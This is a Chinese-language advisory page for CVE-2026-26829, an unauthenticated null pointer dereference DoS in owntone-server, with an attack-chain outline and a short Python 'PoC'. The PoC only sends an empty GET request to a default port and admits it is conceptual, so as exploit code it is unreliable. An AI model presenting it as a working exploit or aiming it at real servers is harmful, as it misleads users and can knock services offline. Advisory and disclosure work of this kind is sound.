CVE-2026-26829 CVSS 7.5 高危

CVE-2026-26829 owntone-server空指针解引用DoS漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26829

漏洞类型

空指针解引用

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

owntone-server

漏洞概述

owntone-server的src/misc.c文件中safe_atou64函数存在空指针解引用漏洞。攻击者无需认证即可通过网络发送特制HTTP请求触发该漏洞，导致服务崩溃，造成拒绝服务。

技术细节

该漏洞源于owntone-server在src/misc.c中的safe_atou64函数未对输入指针进行充分校验。当攻击者发送一系列精心构造的恶意HTTP请求时，会触发函数中的空指针解引用。由于程序试图访问NULL指针指向的内存地址，导致运行时异常，进而引起服务进程终止。此漏洞利用无需用户交互，攻击复杂度低，直接影响系统可用性。

攻击链分析

STEP 1

侦察

攻击者识别网络中运行owntone-server的目标服务器。

STEP 2

漏洞利用

攻击者向目标服务器的特定接口发送一系列特制的HTTP请求，旨在触发safe_atou64函数中的空指针解引用。

STEP 3

拒绝服务

服务器处理恶意请求时崩溃，导致服务不可用，实现DoS攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def trigger_poc(url):
    """
    PoC for CVE-2026-26829: NULL pointer dereference in safe_atou64
    Sending crafted HTTP requests to trigger DoS.
    """
    try:
        # Attempt to send a request that might trigger parsing issues in safe_atou64
        # This is a conceptual PoC based on the description.
        payload = {}
        headers = {'User-Agent': 'CVE-2026-26829-Test'}
        
        # Example endpoint that might process numeric input via safe_atou64
        # Adjust the endpoint based on actual API implementation
        response = requests.get(url, params=payload, headers=headers, timeout=5)
        print(f"Status Code: {response.status_code}")
        print("If the server crashes, the vulnerability is confirmed.")
    except Exception as e:
        print(f"Request failed or server went down: {e}")

if __name__ == "__main__":
    target_url = "http://localhost:3689" # Default port for owntone
    trigger_poc(target_url)

影响范围

owntone-server <= commit c4d57aa

防御指南

临时缓解措施

建议在网络边界部署防火墙规则，限制非受信IP对owntone-server端口的访问，并及时关注官方发布的补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表